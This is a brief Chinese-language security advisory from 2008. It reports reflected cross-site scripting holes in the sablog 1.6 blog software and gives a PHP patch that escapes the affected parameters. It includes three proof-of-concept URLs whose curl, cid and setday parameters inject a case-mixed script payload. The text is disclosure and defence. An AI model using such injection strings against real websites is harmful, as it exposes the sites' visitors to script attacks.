sablog 1.6 多个跨站漏洞

超帅仔仔

Date：2008-03-27\r\nAuthor：amxku[c.r.s.t]\r\nVersion:sablog 1.6\r\n\r\n由于过滤不严，存在多个跨站漏洞\r\n\r\nPS:\r\nhttp://www.amxku.net/?viewmode=list&curl=>\"><ScRiPt%20%0a%0d>alert(amxku)%3B</ScRiPt>\r\nhttp://www.amxku.net/?action=index&cid=>\"><ScRiPt%20%0a%0d>alert(amxku)%3B</ScRiPt>\r\nhttp://www.amxku.net/?action=index&setdate=200804&setday=>\"><ScRiPt%20%0a%0d>alert(amxku)%3B</ScRiPt>&page=1\r\n\r\n临时解决办法：\r\n\r\n在global.php中过滤curl，cid，setday等\r\n$modelink = \'\';\r\nif ($action) {\r\n $modelink .= \'&amp;action=\'.$action;\r\n}\r\nif ($curl) {\r\n $modelink .= \'&amp;curl=\'.htmlspecialchars($curl);\r\n}\r\nif ($cid) {\r\n $modelink .= \'&amp;cid=\'.htmlspecialchars($cid);\r\n}\r\nif ($setdate) {\r\n $modelink .= \'&amp;setdate=\'.htmlspecialchars($setdate);\r\n}\r\nif ($setday) {\r\n $modelink .= \'&amp;setday=\'.htmlspecialchars($setday);\r\n}\r\nif (intval($_GET[\'searchid\'])) {\r\n $modelink .= \'&amp;searchid=\'.htmlspecialchars($_GET[\'searchid\']);\r\n}\r\nif (intval($_GET[\'userid\'])) {\r\n $modelink .= \"&amp;userid=\".htmlspecialchars($_GET[\'userid\']);\r\n}\r\nif ($_GET[\'item\']) {\r\n $item = urlencode(addslashes($item));\r\n $modelink .= \'&amp;item=\'.$item;\r\n}